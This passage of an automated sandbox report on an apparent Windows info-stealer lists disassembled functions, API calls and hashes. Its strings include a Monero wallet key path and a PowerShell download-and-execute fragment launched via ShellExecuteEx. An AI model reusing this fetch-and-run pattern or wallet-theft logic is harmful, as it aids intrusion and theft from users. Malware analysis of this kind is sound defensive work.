                              • RegCloseKey.ADVAPI32(008B76B9), ref: 008B7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 48d7662301350648c9d96c39ffac682af427b92614a297f81ee6c3cc381996ce
                              • Instruction ID: 3ae40b03bedafe3b6bbdd5078fd96edde2748a99a1336ea20c72c76f6dfa8e44
                              • Opcode Fuzzy Hash: 48d7662301350648c9d96c39ffac682af427b92614a297f81ee6c3cc381996ce
                              • Instruction Fuzzy Hash: F00144B5A40308BBEB10DBE4DC89FAEB7B8EB54700F004158FA05EB281DA7065018F52
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                              • LocalFree.KERNEL32(008A148F), ref: 008A9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 59cbec864432b68ff56d7420c8dd4d11fdea1a477c176f6665d66a742bc2f005
                              • Instruction ID: 375c1f578cd3df547e22daf46ac5248313b7b277c2cda8625bbe3bc6a3662dd8
                              • Opcode Fuzzy Hash: 59cbec864432b68ff56d7420c8dd4d11fdea1a477c176f6665d66a742bc2f005
                              • Instruction Fuzzy Hash: 1B3129B4A00209EFEF14CF94C885BAE77B5FF49350F108159E916EB690D774AA41CFA1
                              APIs
                              • lstrcat.KERNEL32(?,0142EB90), ref: 008B47DB
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4801
                              • lstrcat.KERNEL32(?,?), ref: 008B4820
                              • lstrcat.KERNEL32(?,?), ref: 008B4834
                              • lstrcat.KERNEL32(?,0141B078), ref: 008B4847
                              • lstrcat.KERNEL32(?,?), ref: 008B485B
                              • lstrcat.KERNEL32(?,0142CE90), ref: 008B486F
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008B8D90: GetFileAttributesA.KERNEL32(00000000,?,008A1B54,?,?,008C564C,?,?,008C0E1F), ref: 008B8D9F
                                • Part of subcall function 008B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008B4580
                                • Part of subcall function 008B4570: RtlAllocateHeap.NTDLL(00000000), ref: 008B4587
                                • Part of subcall function 008B4570: wsprintfA.USER32 ref: 008B45A6
                                • Part of subcall function 008B4570: FindFirstFileA.KERNEL32(?,?), ref: 008B45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 54eeed5891c768d13bba6c93ca638a5cde7a592558f28e5a061546d1f3312eb5
                              • Instruction ID: cfb652fd061d1377cbe46f506c3658943d9728902605a2afde9d4d5af70b1d48
                              • Opcode Fuzzy Hash: 54eeed5891c768d13bba6c93ca638a5cde7a592558f28e5a061546d1f3312eb5
                              • Instruction Fuzzy Hash: 0E31AFB2900208A7DB14FBB4DCC6EE9777CFB58700F404589B319D6181EE70A78ACB92
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B2D85
                              Strings
                              • ')", xrefs: 008B2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 008B2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 008B2D04
                              • <, xrefs: 008B2D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 7719d123fe84ff9bdc5059dde25064bda49899e22fdadcd0318c9c010f2e9c9d
                              • Instruction ID: a431b16a2c594c0149f114dfe0b429c23ca093454eda68c0d2088a44e536e6c6
                              • Opcode Fuzzy Hash: 7719d123fe84ff9bdc5059dde25064bda49899e22fdadcd0318c9c010f2e9c9d
                              • Instruction Fuzzy Hash: DF41AD71810208AADB18EBA4C8A1FDDBB74FF14700F404129E116EA291DF746A4ACF92
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 008A9F41
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 2dc7b6906dfc4078dbb1168ce5b48310b7dfe81b46de15ccb2d8e8a9d6540bba
                              • Instruction ID: 44a9d9010dee76b8f1786385081a4e92475da76526f4c947b57734bfc487ae35
                              • Opcode Fuzzy Hash: 2dc7b6906dfc4078dbb1168ce5b48310b7dfe81b46de15ccb2d8e8a9d6540bba
                              • Instruction Fuzzy Hash: 71610E71900248EBDB28EFA8CC96FDD7775FF45304F008518E9099BA91DB746A05CB52
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0142D030,00000000,00020119,?), ref: 008B40F4
                              • RegQueryValueExA.ADVAPI32(?,0142EB18,00000000,00000000,00000000,000000FF), ref: 008B4118
                              • RegCloseKey.ADVAPI32(?), ref: 008B4122
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4147
                              • lstrcat.KERNEL32(?,0142EB48), ref: 008B415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: a23d4614b6e05c8e46801cea61b8cd1adef4ce06d00728c4e24fa9702d440fa8
                              • Instruction ID: f5ea63e0dad7486d39c86026849ddb923ca2932d3c9c99ee0a6b3946345385c1
                              • Opcode Fuzzy Hash: a23d4614b6e05c8e46801cea61b8cd1adef4ce06d00728c4e24fa9702d440fa8
                              • Instruction Fuzzy Hash: 6541BBB6D001086BDB14EBE4DC86FFE737DF798300F004558B7159A181EA75AB898B93
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 008B696C
                              • sscanf.NTDLL ref: 008B6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008B69C0
                              • ExitProcess.KERNEL32 ref: 008B69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 40aec355a08fe165b8e974d7d1d5371de65ebbcff038299bd511f68da928700e
                              • Instruction ID: 1045c63916a2c3788a0266b8e24a79e6f29c63d12dca789db7912d0ba7f8c072
                              • Opcode Fuzzy Hash: 40aec355a08fe165b8e974d7d1d5371de65ebbcff038299bd511f68da928700e
                              • Instruction Fuzzy Hash: CD21CB75D14208ABCF08EFE8D9859EEB7B5FF58300F04852AE416E7250EB346619CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0141B5B8,00000000,00020119,?), ref: 008B7E5E
                              • RegQueryValueExA.ADVAPI32(?,0142CFB0,00000000,00000000,000000FF,000000FF), ref: 008B7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 008B7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 38fb588ec4c8132e712136c4591cfeec6200d6a660f25a7328275bb4d29cdbcb
                              • Instruction ID: b6db8303ff9402c75579f3de1252758f973a4da46735dcc06000f010e46d3a7a
                              • Opcode Fuzzy Hash: 38fb588ec4c8132e712136c4591cfeec6200d6a660f25a7328275bb4d29cdbcb
                              • Instruction Fuzzy Hash: 97113DB1A44249EBD710CBD4DD89FABBBB8FB44B10F104159F615EB380D77468018BA2
                              APIs
                              • StrStrA.SHLWAPI(0142E6F8,?,?,?,008B140C,?,0142E6F8,00000000), ref: 008B926C
                              • lstrcpyn.KERNEL32(00AEAB88,0142E6F8,0142E6F8,?,008B140C,?,0142E6F8), ref: 008B9290
                              • lstrlen.KERNEL32(?,?,008B140C,?,0142E6F8), ref: 008B92A7
                              • wsprintfA.USER32 ref: 008B92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: c262325fddf7712143534472ff30af41d2ba5b2b630a4b5f597ad734de19e5df
                              • Instruction ID: 84bbdca69a83204501755fd246c99cc800db51d4cdf3b4e33c180ecde47ce1bd
                              • Opcode Fuzzy Hash: c262325fddf7712143534472ff30af41d2ba5b2b630a4b5f597ad734de19e5df
                              • Instruction Fuzzy Hash: CE01A575500148FFCB04DFECC998EAE7BB9FB58354F108548F9099B205C671AE41DB92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008A12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008A12F5
                              • RegCloseKey.ADVAPI32(?), ref: 008A12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 4880c900c6c29f6c3e15e035f9f0250bd78fe447346f3cc662a8bc412488e86f
                              • Instruction ID: b4beb1bd30de63aba92cba24637eccb040bff4d8b7e7fc01788f7fea64f2753e
                              • Opcode Fuzzy Hash: 4880c900c6c29f6c3e15e035f9f0250bd78fe447346f3cc662a8bc412488e86f
                              • Instruction Fuzzy Hash: F201E1B9A40248BFDB14DFE4DC89FAEB7B8EB58701F108159FA05DB280D675AA018F51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 9df2bc4144788da144407dfe84232dd707c84d2bc8eb1b8c036d156c26f5e26b
                              • Instruction ID: 659d5d951d148949a0c26a257cbdc370d4d479476a7365af06b160f00def3e1e
                              • Opcode Fuzzy Hash: 9df2bc4144788da144407dfe84232dd707c84d2bc8eb1b8c036d156c26f5e26b
                              • Instruction Fuzzy Hash: 1341E67150075C5EEB218B288D85FFB7FE8FB45708F1444E8E98AC6282E2719A45CF61
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008B6663
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B6726
                              • ExitProcess.KERNEL32 ref: 008B6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: e7d5c4636700305feaf1a98ee92fc575518d43d95e83dbae16641ead25e32433
                              • Instruction ID: 6ce7aa68284e9569fbe28f3c3b307876718a7f339028a76d5a5d8ba6fbe9b80c
                              • Opcode Fuzzy Hash: e7d5c4636700305feaf1a98ee92fc575518d43d95e83dbae16641ead25e32433
                              • Instruction Fuzzy Hash: EF312DB1801218AADB18EB94DC91BDD7B7CFF14300F404199F215A6291DF746B49CF66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E28,00000000,?), ref: 008B882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B8836
                              • wsprintfA.USER32 ref: 008B8850
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: e4ae1d051de5c86f5e35f346892ebd6eef9299bf5744b9c4a7c1b22074dc2170
                              • Instruction ID: 81c0b68861c33fb93aae23fe141e97c78bb95daf3551860b393ea2cccc6ef3d5
                              • Opcode Fuzzy Hash: e4ae1d051de5c86f5e35f346892ebd6eef9299bf5744b9c4a7c1b22074dc2170
                              • Instruction Fuzzy Hash: C021FEB1A44248AFDB04DFD4DD85FAEBBB8FB49711F104519F605EB280C779A9018BA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008B951E,00000000), ref: 008B8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B8D62
                              • wsprintfW.USER32 ref: 008B8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 5ed4ecc9a91c637e7eb455aff0625e81eab0b8b9478dfae48bbe63ab8a176d21
                              • Instruction ID: 65d18f8d3add212fe5177e21684a6aa0b876139e8af1904ebda3dde31a996bd6
                              • Opcode Fuzzy Hash: 5ed4ecc9a91c637e7eb455aff0625e81eab0b8b9478dfae48bbe63ab8a176d21
